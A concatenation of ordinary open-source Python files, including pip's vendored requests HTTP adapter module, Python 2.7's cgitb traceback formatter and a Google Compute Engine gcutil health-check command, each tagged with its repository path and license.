preference_key=preference_key, preference_value=preference_value, error=serializer.errors
)
if "key" in serializer.errors:
user_message = _(u"Invalid user preference key '{preference_key}'.").format(
preference_key=preference_key
)
else:
user_message = _(u"Value '{preference_value}' is not valid for user preference '{preference_key}'.").format(
preference_key=preference_key, preference_value=preference_value
)
raise PreferenceValidationError({
preference_key: {
"developer_message": developer_message,
"user_message": user_message,
}
})
def _create_preference_update_error(preference_key, preference_value, error):
""" Creates a PreferenceUpdateError with developer_message and user_message. """
return PreferenceUpdateError(
developer_message=u"Save failed for user preference '{key}' with value '{value}': {error}".format(
key=preference_key, value=preference_value, error=error
),
user_message=_(u"Save failed for user preference '{key}' with value '{value}'.").format(
key=preference_key, value=preference_value
),
)
| agpl-3.0 |
perlygatekeeper/glowing-robot | Little_Alchemy_2/Scraper_python/env/lib/python3.7/site-packages/pip/_vendor/requests/adapters.py | 54 | 21548 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import os.path
import socket
from pip._vendor.urllib3.poolmanager import PoolManager, proxy_from_url
from pip._vendor.urllib3.response import HTTPResponse
from pip._vendor.urllib3.util import parse_url
from pip._vendor.urllib3.util import Timeout as TimeoutSauce
from pip._vendor.urllib3.util.retry import Retry
from pip._vendor.urllib3.exceptions import ClosedPoolError
from pip._vendor.urllib3.exceptions import ConnectTimeoutError
from pip._vendor.urllib3.exceptions import HTTPError as _HTTPError
from pip._vendor.urllib3.exceptions import MaxRetryError
from pip._vendor.urllib3.exceptions import NewConnectionError
from pip._vendor.urllib3.exceptions import ProxyError as _ProxyError
from pip._vendor.urllib3.exceptions import ProtocolError
from pip._vendor.urllib3.exceptions import ReadTimeoutError
from pip._vendor.urllib3.exceptions import SSLError as _SSLError
from pip._vendor.urllib3.exceptions import ResponseError
from pip._vendor.urllib3.exceptions import LocationValueError
from .models import Response
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, extract_zipped_paths,
get_encoding_from_headers, prepend_scheme_if_needed,
get_auth_from_url, urldefragauth, select_proxy)
from .structures import CaseInsensitiveDict
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError, InvalidSchema, InvalidProxyURL,
InvalidURL)
from .auth import _basic_auth_str
try:
from pip._vendor.urllib3.contrib.socks import SOCKSProxyManager
except ImportError:
def SOCKSProxyManager(*args, **kwargs):
raise InvalidSchema("Missing dependencies for SOCKS support.")
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
DEFAULT_POOL_TIMEOUT = None
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self, request, stream=False, timeout=None, verify=True,
cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple
:param verify: (optional) Either a boolean, in which case it controls whether we verify
the server's TLS certificate, or a string, in which case it must be a path
to a CA bundle to use
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
raise NotImplementedError
def close(self):
"""Cleans up adapter specific items."""
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed DNS lookups, socket
connections and connection timeouts, never to requests where data has
made it to the server. By default, Requests does not retry failed
connections. If you need granular control over the conditions under
which we retry a request, import urllib3's ``Retry`` class and pass
that instead.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
if max_retries == DEFAULT_RETRIES:
self.max_retries = Retry(0, read=False)
else:
self.max_retries = Retry.from_int(max_retries)
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return {attr: getattr(self, attr, None) for attr in self.__attrs__}
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, strict=True, **pool_kwargs)
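# Added subclass sketch (hedged): because ``pool_kwargs`` is forwarded to
# urllib3's PoolManager, a subclass can inject pool-level options such as
# a custom SSLContext (``ssl_context`` is a real urllib3 pool kwarg):
#   class SSLContextAdapter(HTTPAdapter):
#       def init_poolmanager(self, *args, **kwargs):
#           kwargs['ssl_context'] = my_ssl_context  # built elsewhere
#           return super(SSLContextAdapter, self).init_poolmanager(
#               *args, **kwargs)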
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
:rtype: urllib3.ProxyManager
"""
if proxy in self.proxy_manager:
manager = self.proxy_manager[proxy]
elif proxy.lower().startswith('socks'):
username, password = get_auth_from_url(proxy)
manager = self.proxy_manager[proxy] = SOCKSProxyManager(
proxy,
username=username,
password=password,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs
)
else:
proxy_headers = self.proxy_headers(proxy)
manager = self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return manager
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Either a boolean, in which case it controls whether we verify
the server's TLS certificate, or a string, in which case it must be a path
to a CA bundle to use
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH)
if not cert_loc or not os.path.exists(cert_loc):
raise IOError("Could not find a suitable TLS CA certificate bundle, "
"invalid path: {}".format(cert_loc))
conn.cert_reqs = 'CERT_REQUIRED'
if not os.path.isdir(cert_loc):
conn.ca_certs = cert_loc
else:
conn.ca_cert_dir = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
conn.ca_cert_dir = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
conn.key_file = None
if conn.cert_file and not os.path.exists(conn.cert_file):
raise IOError("Could not find the TLS certificate file, "
"invalid path: {}".format(conn.cert_file))
if conn.key_file and not os.path.exists(conn.key_file):
raise IOError("Could not find the TLS key file, "
"invalid path: {}".format(conn.key_file))
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
:rtype: requests.Response
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
:rtype: urllib3.ConnectionPool
"""
proxy = select_proxy(url, proxies)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_url = parse_url(proxy)
if not proxy_url.host:
raise InvalidProxyURL("Please check proxy URL. It is malformed"
" and could be missing the host.")
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this closes the PoolManager and any active ProxyManager,
which closes any pooled connections.
"""
self.poolmanager.clear()
for proxy in self.proxy_manager.values():
proxy.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
        If the message is being sent through an HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
:rtype: str
"""
proxy = select_proxy(request.url, proxies)
scheme = urlparse(request.url).scheme
is_proxied_http_request = (proxy and scheme != 'https')
using_socks_proxy = False
if proxy:
proxy_scheme = urlparse(proxy).scheme.lower()
using_socks_proxy = proxy_scheme.startswith('socks')
url = request.path_url
if is_proxied_http_request and not using_socks_proxy:
url = urldefragauth(request.url)
return url
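    # Editor's sketch (hedged, not part of requests): for a request to the
    # illustrative URL 'http://example.org/page?x=1#frag' this returns
    # '/page?x=1' when no proxy is used, and the defragmented absolute form
    # 'http://example.org/page?x=1' when the request is forwarded through a
    # plain HTTP proxy (HTTPS requests are tunnelled, so they keep the path
    # form).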
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The url of the proxy being used for this request.
:rtype: dict
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
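    # Editor's sketch (hedged, not part of requests): a proxy URL carrying
    # credentials yields a basic-auth header, e.g.
    #   adapter.proxy_headers('http://user:secret@proxy.local:3128')
    # would return {'Proxy-Authorization': 'Basic dXNlcjpzZWNyZXQ='};
    # the host and credentials are invented for illustration.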
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple or urllib3 Timeout object
:param verify: (optional) Either a boolean, in which case it controls whether
we verify the server's TLS certificate, or a string, in which case it
must be a path to a CA bundle to use
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
:rtype: requests.Response
"""
try:
conn = self.get_connection(request.url, proxies)
except LocationValueError as e:
raise InvalidURL(e, request=request)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if isinstance(timeout, tuple):
try:
connect, read = timeout
timeout = TimeoutSauce(connect=connect, read=read)
except ValueError as e:
# this may raise a string formatting error.
err = ("Invalid timeout {}. Pass a (connect, read) "
"timeout tuple, or a single float to set "
"both timeouts to the same value".format(timeout))
raise ValueError(err)
elif isinstance(timeout, TimeoutSauce):
pass
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
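                    # Editor's note (hedged): the loop below hand-rolls
                    # HTTP/1.1 chunked transfer encoding: each chunk is its
                    # size in hex, CRLF, the data, CRLF, and the stream ends
                    # with a zero-length chunk ('0\r\n\r\n').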
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
# Receive the response from the server
try:
# For Python 2.7, use buffering of HTTP responses
r = low_conn.getresponse(buffering=True)
except TypeError:
# For compatibility with Python 3.3+
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
except (ProtocolError, socket.error) as err:
raise ConnectionError(err, request=request)
except MaxRetryError as e:
if isinstance(e.reason, ConnectTimeoutError):
# TODO: Remove this in 3.0.0: see #2811
if not isinstance(e.reason, NewConnectionError):
raise ConnectTimeout(e, request=request)
if isinstance(e.reason, ResponseError):
raise RetryError(e, request=request)
if isinstance(e.reason, _ProxyError):
raise ProxyError(e, request=request)
if isinstance(e.reason, _SSLError):
# This branch is for urllib3 v1.22 and later.
raise SSLError(e, request=request)
raise ConnectionError(e, request=request)
except ClosedPoolError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
# This branch is for urllib3 versions earlier than v1.22
raise SSLError(e, request=request)
elif isinstance(e, ReadTimeoutError):
raise ReadTimeout(e, request=request)
else:
raise
return self.build_response(request, resp)
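# Editor's usage sketch (not part of the original module): a transport adapter
# is normally attached to a Session; the pool sizes, retry count and URL below
# are illustrative assumptions, not values mandated by requests.
def _example_mount_adapter():
    import requests
    session = requests.Session()
    # Reuse up to 10 connection pools of 10 connections each and retry
    # failed connection attempts up to 3 times.
    adapter = requests.adapters.HTTPAdapter(
        pool_connections=10, pool_maxsize=10, max_retries=3)
    session.mount('https://', adapter)
    # (connect timeout, read timeout) tuple, as documented for send() above.
    return session.get('https://example.org', timeout=(3.05, 27))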
| artistic-2.0 |
pniedzielski/fb-hackathon-2013-11-21 | src/repl.it/jsrepl/extern/python/unclosured/lib/python2.7/cgitb.py | 113 | 12073 | """More comprehensive traceback formatting for Python scripts.
To enable this module, do:
import cgitb; cgitb.enable()
at the top of your script. The optional arguments to enable() are:
display - if true, tracebacks are displayed in the web browser
logdir - if set, tracebacks are written to files in this directory
context - number of lines of source code to show for each stack frame
format - 'text' or 'html' controls the output format
By default, tracebacks are displayed but not saved, the context is 5 lines
and the output format is 'html' (for backwards compatibility with the
original use of this module)
Alternatively, if you have caught an exception and want cgitb to display it
for you, call cgitb.handler(). The optional argument to handler() is a
3-item tuple (etype, evalue, etb) just like the value of sys.exc_info().
The default handler displays output as HTML.
"""
import inspect
import keyword
import linecache
import os
import pydoc
import sys
import tempfile
import time
import tokenize
import traceback
import types
def reset():
"""Return a string that resets the CGI and browser to a known state."""
return '''<!--: spam
Content-Type: text/html
<body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> -->
<body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> --> -->
</font> </font> </font> </script> </object> </blockquote> </pre>
</table> </table> </table> </table> </table> </font> </font> </font>'''
__UNDEF__ = [] # a special sentinel object
def small(text):
if text:
return '<small>' + text + '</small>'
else:
return ''
def strong(text):
if text:
return '<strong>' + text + '</strong>'
else:
return ''
def grey(text):
if text:
return '<font color="#909090">' + text + '</font>'
else:
return ''
def lookup(name, frame, locals):
"""Find the value for a given name in the given environment."""
if name in locals:
return 'local', locals[name]
if name in frame.f_globals:
return 'global', frame.f_globals[name]
if '__builtins__' in frame.f_globals:
builtins = frame.f_globals['__builtins__']
if type(builtins) is type({}):
if name in builtins:
return 'builtin', builtins[name]
else:
if hasattr(builtins, name):
return 'builtin', getattr(builtins, name)
return None, __UNDEF__
def scanvars(reader, frame, locals):
"""Scan one logical line of Python and look up values of variables used."""
vars, lasttoken, parent, prefix, value = [], None, None, '', __UNDEF__
for ttype, token, start, end, line in tokenize.generate_tokens(reader):
if ttype == tokenize.NEWLINE: break
if ttype == tokenize.NAME and token not in keyword.kwlist:
if lasttoken == '.':
if parent is not __UNDEF__:
value = getattr(parent, token, __UNDEF__)
vars.append((prefix + token, prefix, value))
else:
where, value = lookup(token, frame, locals)
vars.append((token, where, value))
elif token == '.':
prefix += lasttoken + '.'
parent = value
else:
parent, prefix = None, ''
lasttoken = token
return vars
def html(einfo, context=5):
"""Return a nice HTML document describing a given traceback."""
etype, evalue, etb = einfo
if type(etype) is types.ClassType:
etype = etype.__name__
pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
date = time.ctime(time.time())
head = '<body bgcolor="#f0f0f8">' + pydoc.html.heading(
'<big><big>%s</big></big>' %
strong(pydoc.html.escape(str(etype))),
'#ffffff', '#6622aa', pyver + '<br>' + date) + '''
<p>A problem occurred in a Python script. Here is the sequence of
function calls leading up to the error, in the order they occurred.</p>'''
    indent = '<tt>' + small('&nbsp;' * 5) + '&nbsp;</tt>'
frames = []
records = inspect.getinnerframes(etb, context)
for frame, file, lnum, func, lines, index in records:
if file:
file = os.path.abspath(file)
link = '<a href="file://%s">%s</a>' % (file, pydoc.html.escape(file))
else:
file = link = '?'
args, varargs, varkw, locals = inspect.getargvalues(frame)
call = ''
if func != '?':
call = 'in ' + strong(func) + \
inspect.formatargvalues(args, varargs, varkw, locals,
formatvalue=lambda value: '=' + pydoc.html.repr(value))
highlight = {}
def reader(lnum=[lnum]):
highlight[lnum[0]] = 1
try: return linecache.getline(file, lnum[0])
finally: lnum[0] += 1
vars = scanvars(reader, frame, locals)
rows = ['<tr><td bgcolor="#d8bbff">%s%s %s</td></tr>' %
                ('<big>&nbsp;</big>', link, call)]
if index is not None:
i = lnum - index
for line in lines:
                num = small('&nbsp;' * (5-len(str(i))) + str(i)) + '&nbsp;'
if i in highlight:
                    line = '<tt>=&gt;%s%s</tt>' % (num, pydoc.html.preformat(line))
rows.append('<tr><td bgcolor="#ffccee">%s</td></tr>' % line)
else:
                    line = '<tt>&nbsp;&nbsp;%s%s</tt>' % (num, pydoc.html.preformat(line))
rows.append('<tr><td>%s</td></tr>' % grey(line))
i += 1
done, dump = {}, []
for name, where, value in vars:
if name in done: continue
done[name] = 1
if value is not __UNDEF__:
if where in ('global', 'builtin'):
name = ('<em>%s</em> ' % where) + strong(name)
elif where == 'local':
name = strong(name)
else:
name = where + strong(name.split('.')[-1])
dump.append('%s = %s' % (name, pydoc.html.repr(value)))
else:
dump.append(name + ' <em>undefined</em>')
rows.append('<tr><td>%s</td></tr>' % small(grey(', '.join(dump))))
frames.append('''
<table width="100%%" cellspacing=0 cellpadding=0 border=0>
%s</table>''' % '\n'.join(rows))
exception = ['<p>%s: %s' % (strong(pydoc.html.escape(str(etype))),
pydoc.html.escape(str(evalue)))]
if isinstance(evalue, BaseException):
for name in dir(evalue):
if name[:1] == '_': continue
value = pydoc.html.repr(getattr(evalue, name))
            exception.append('\n<br>%s%s&nbsp;=\n%s' % (indent, name, value))
return head + ''.join(frames) + ''.join(exception) + '''
<!-- The above is a description of an error in a Python program, formatted
for a Web browser because the 'cgitb' module was enabled. In case you
are not reading this in a Web browser, here is the original traceback:
%s
-->
''' % pydoc.html.escape(
''.join(traceback.format_exception(etype, evalue, etb)))
def text(einfo, context=5):
"""Return a plain text document describing a given traceback."""
etype, evalue, etb = einfo
if type(etype) is types.ClassType:
etype = etype.__name__
pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
date = time.ctime(time.time())
head = "%s\n%s\n%s\n" % (str(etype), pyver, date) + '''
A problem occurred in a Python script. Here is the sequence of
function calls leading up to the error, in the order they occurred.
'''
frames = []
records = inspect.getinnerframes(etb, context)
for frame, file, lnum, func, lines, index in records:
file = file and os.path.abspath(file) or '?'
args, varargs, varkw, locals = inspect.getargvalues(frame)
call = ''
if func != '?':
call = 'in ' + func + \
inspect.formatargvalues(args, varargs, varkw, locals,
formatvalue=lambda value: '=' + pydoc.text.repr(value))
highlight = {}
def reader(lnum=[lnum]):
highlight[lnum[0]] = 1
try: return linecache.getline(file, lnum[0])
finally: lnum[0] += 1
vars = scanvars(reader, frame, locals)
rows = [' %s %s' % (file, call)]
if index is not None:
i = lnum - index
for line in lines:
num = '%5d ' % i
rows.append(num+line.rstrip())
i += 1
done, dump = {}, []
for name, where, value in vars:
if name in done: continue
done[name] = 1
if value is not __UNDEF__:
if where == 'global': name = 'global ' + name
elif where != 'local': name = where + name.split('.')[-1]
dump.append('%s = %s' % (name, pydoc.text.repr(value)))
else:
dump.append(name + ' undefined')
rows.append('\n'.join(dump))
frames.append('\n%s\n' % '\n'.join(rows))
exception = ['%s: %s' % (str(etype), str(evalue))]
if isinstance(evalue, BaseException):
for name in dir(evalue):
value = pydoc.text.repr(getattr(evalue, name))
exception.append('\n%s%s = %s' % (" "*4, name, value))
return head + ''.join(frames) + ''.join(exception) + '''
The above is a description of an error in a Python program. Here is
the original traceback:
%s
''' % ''.join(traceback.format_exception(etype, evalue, etb))
class Hook:
"""A hook to replace sys.excepthook that shows tracebacks in HTML."""
def __init__(self, display=1, logdir=None, context=5, file=None,
format="html"):
self.display = display # send tracebacks to browser if true
self.logdir = logdir # log tracebacks to files if not None
self.context = context # number of source code lines per frame
self.file = file or sys.stdout # place to send the output
self.format = format
def __call__(self, etype, evalue, etb):
self.handle((etype, evalue, etb))
def handle(self, info=None):
info = info or sys.exc_info()
if self.format == "html":
self.file.write(reset())
formatter = (self.format=="html") and html or text
plain = False
try:
doc = formatter(info, self.context)
except: # just in case something goes wrong
doc = ''.join(traceback.format_exception(*info))
plain = True
if self.display:
if plain:
                doc = doc.replace('&', '&amp;').replace('<', '&lt;')
self.file.write('<pre>' + doc + '</pre>\n')
else:
self.file.write(doc + '\n')
else:
self.file.write('<p>A problem occurred in a Python script.\n')
if self.logdir is not None:
suffix = ['.txt', '.html'][self.format=="html"]
(fd, path) = tempfile.mkstemp(suffix=suffix, dir=self.logdir)
try:
file = os.fdopen(fd, 'w')
file.write(doc)
file.close()
msg = '<p> %s contains the description of this error.' % path
except:
msg = '<p> Tried to save traceback to %s, but failed.' % path
self.file.write(msg + '\n')
try:
self.file.flush()
except: pass
handler = Hook().handle
def enable(display=1, logdir=None, context=5, format="html"):
"""Install an exception handler that formats tracebacks as HTML.
The optional argument 'display' can be set to 0 to suppress sending the
traceback to the browser, and 'logdir' can be set to a directory to cause
tracebacks to be written to files there."""
sys.excepthook = Hook(display=display, logdir=logdir,
context=context, format=format)
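# Editor's sketch (hedged, not in the stdlib source): typical wiring for the
# hook; the log directory and plain-text format are illustrative choices.
def _example_usage():
    import cgitb
    cgitb.enable(display=1, logdir='/tmp/cgitb-logs', format='text')
    try:
        1 / 0
    except ZeroDivisionError:
        # Or handle a caught exception explicitly, as the module docstring
        # describes; with no argument this formats sys.exc_info().
        cgitb.handler()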
| agpl-3.0 |
harshilasu/LinkurApp | y/google-cloud-sdk/platform/gcutil/lib/google_compute_engine/gcutil_lib/http_health_check_cmds.py | 4 | 13283 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands for interacting with Google Compute Engine HTTP health checks."""
from google.apputils import appcommands
import gflags as flags
from gcutil_lib import command_base
FLAGS = flags.FLAGS
class HttpHealthCheckCommand(command_base.GoogleComputeCommand):
"""Base command for working with the HTTP health check collection."""
print_spec = command_base.ResourcePrintSpec(
summary=['name', 'host', 'port'],
field_mappings=(
('name', 'name'),
('description', 'description'),
('host', 'host'),
('port', 'port'),
('request-path', 'requestPath')),
detail=(
('name', 'name'),
('description', 'description'),
('creation-time', 'creationTimestamp'),
('host', 'host'),
('port', 'port'),
('request-path', 'requestPath'),
('check-interval-sec', 'checkIntervalSec'),
('check-timeout-sec', 'timeoutSec'),
('unhealthy-threshold', 'unhealthyThreshold'),
('healthy-threshold', 'healthyThreshold')),
sort_by='name')
resource_collection_name = 'httpHealthChecks'
# The default health check host.
DEFAULT_HOST = ''
# The default health check port.
DEFAULT_PORT = 80
# The default health check request path.
DEFAULT_REQUEST_PATH = '/'
# The default health check interval in seconds.
DEFAULT_CHECK_INTERVAL_SEC = 5
# The default health check timeout in seconds.
DEFAULT_CHECK_TIMEOUT_SEC = 5
# The default number of failures before marking a VM unhealthy.
DEFAULT_UNHEALTHY_THRESHOLD = 2
# The default number of successes before marking a VM healthy.
DEFAULT_HEALTHY_THRESHOLD = 2
def __init__(self, name, flag_values):
super(HttpHealthCheckCommand, self).__init__(name, flag_values)
class AddHttpHealthCheck(HttpHealthCheckCommand):
"""Create a new HTTP health check to handle network load balancing."""
positional_args = '<http-health-check-name>'
def __init__(self, name, flag_values):
super(AddHttpHealthCheck, self).__init__(name, flag_values)
flags.DEFINE_string('description',
'',
'An optional HTTP health check description.',
flag_values=flag_values)
flags.DEFINE_string('host',
self.DEFAULT_HOST,
'Specifies the value of the host header used in this '
'HTTP health check request. The default value is the '
'external IP address of the forwarding rule '
'associated with this target pool.',
flag_values=flag_values)
flags.DEFINE_string('request_path',
self.DEFAULT_REQUEST_PATH,
'Specifies the request path of the HTTP health check '
'request. The default path is \'/\'.',
flag_values=flag_values)
flags.DEFINE_string('port',
self.DEFAULT_PORT,
'Specifies the TCP port of the HTTP health check '
'request. The default port is \'80\'.',
flag_values=flag_values)
flags.DEFINE_integer('check_interval_sec',
self.DEFAULT_CHECK_INTERVAL_SEC,
'Specifies how often, in seconds, to send a health '
'check. The default is 5 seconds.',
flag_values=flag_values)
flags.DEFINE_integer('check_timeout_sec',
self.DEFAULT_CHECK_TIMEOUT_SEC,
'Specifies how long to wait, in seconds, before '
'the health check is considered a failure for each '
'individual instance. The default is 5 seconds. ',
flag_values=flag_values)
flags.DEFINE_integer('unhealthy_threshold',
self.DEFAULT_UNHEALTHY_THRESHOLD,
'Specifies how many consecutive health check '
'failures must happen before a previously healthy '
'VM is marked unhealthy. The default is 2.',
flag_values=flag_values)
flags.DEFINE_integer('healthy_threshold',
self.DEFAULT_HEALTHY_THRESHOLD,
'Specifies how many consecutive health check '
'successes must happen before a previously unhealthy '
'VM will be marked healthy. The default is 2.',
flag_values=flag_values)
def Handle(self, http_health_check_name):
"""Add the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to add.
Returns:
The result of inserting the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_health_check_resource = {
'kind': self._GetResourceApiKind('httpHealthCheck'),
'name': http_health_check_context['httpHealthCheck'],
'description': self._flags.description,
'host': self._flags.host,
'requestPath': self._flags.request_path,
'port': self._flags.port,
'checkIntervalSec': self._flags.check_interval_sec,
'timeoutSec': self._flags.check_timeout_sec,
